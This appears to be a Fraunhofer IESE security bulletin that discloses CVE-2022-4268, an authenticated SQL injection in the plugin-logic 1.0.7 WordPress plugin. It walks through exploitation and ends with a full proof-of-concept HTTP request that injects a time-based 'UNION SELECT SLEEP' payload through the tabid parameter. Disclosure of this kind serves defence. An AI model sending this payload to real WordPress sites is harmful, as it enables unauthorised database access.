Security Bulletin
of the Fraunhofer IESE Research Institute
Home
/
plugin-logic 1.0.7 WordPress plug-in SQL injection

plugin-logic 1.0.7 WordPress plug-in SQL injection

Vulnerability Metadata

Key Value
Date of Disclosure December 02 2022
Affected Software plugin-logic
Affected Software Type WordPress plugin
Version 1.0.7
Weakness SQL Injection
CWE ID CWE-89
CVE ID CVE-2022-4268
CVSS 3.x Base Score n/a
CVSS 2.0 Base Score n/a
Reporter Kunal Sharma, Daniel Krohmer
Reporter Contact k_sharma19@informatik.uni-kl.de
Link to Affected Software https://wordpress.org/plugins/plugin-logic/
Link to Vulnerability DB https://nvd.nist.gov/vuln/detail/CVE-2022-4268

Vulnerability Description

The tabid GET query parameter in plugin-logic 1.0.7 is vulnerable to SQL injection. An authenticated attacker may abuse the fetch active plugins functionality in plulo_option_page function inside plugin-logic.php. This leads to a threat actor in a multisite setup crafting a malicious GET request.

Exploitation Guide

Login as admin user. This attack requires at least admin privileges. Note: The plugin should be installed in a multisite network.

plugin-logic_step-1.png

Go to PLugin Logic under Plugins option on the WordPress site dashboard.

plugin-logic_step-2.png

Click Save Changes on any tab.

plugin-logic_step-3.png

Clicking this button triggers the vulnerable request. We have to add an additional GET query parametertabid in the request.

plugin-logic_step-4.png

A POC may look like the following request:

plugin-logic_step-5.png

In the code, the vulnerability is triggered by un-sanitized user input of tabid at line 203 in ./plugin-logic.php.

plugin-logic_step-6.png

At lines 213-216 in ./plugin-logic.php the database query call on $selected_blog leads to SQL injection.

plugin-logic_step-7.png

Exploit Payload

Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

The SQL injection can be triggered by sending the request below:

POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%2bunion%2bSELECT%2bSLEEP(6)%3b%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/network/plugins.php?page=plugin-logic
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Origin: http://localhost
Connection: close
Cookie: wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1666185599; wp-settings-8=libraryContent%3Dbrowse; wp-settings-time-8=1666389039; wordpress_test_cookie=WP%20Cookie%20check; wordpress_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666566701%7COfIsPG6DZPN1yTZcYsQ9O8Co7ADOvG6nne9kO5iGtqs%7C0abf94c1e22528cf048ff22b03d79223ba73c502056deb9a9ce748fa0c03b2c0; wordpress_logged_in_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666566701%7COfIsPG6DZPN1yTZcYsQ9O8Co7ADOvG6nne9kO5iGtqs%7C9bf5c239139b198a8856c9927f2cf4835b8583556b6e07b6270ec1284a59f953
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

plulo_checklist%5B0%5D=0&plulo_checklist%5B0%5D=1&plulo_radiolist%5B0%5D=0&plulo_txt_list%5B0%5D=&plulo_submit=Save+Changes
© 2022 IESE
Imprint
Data protection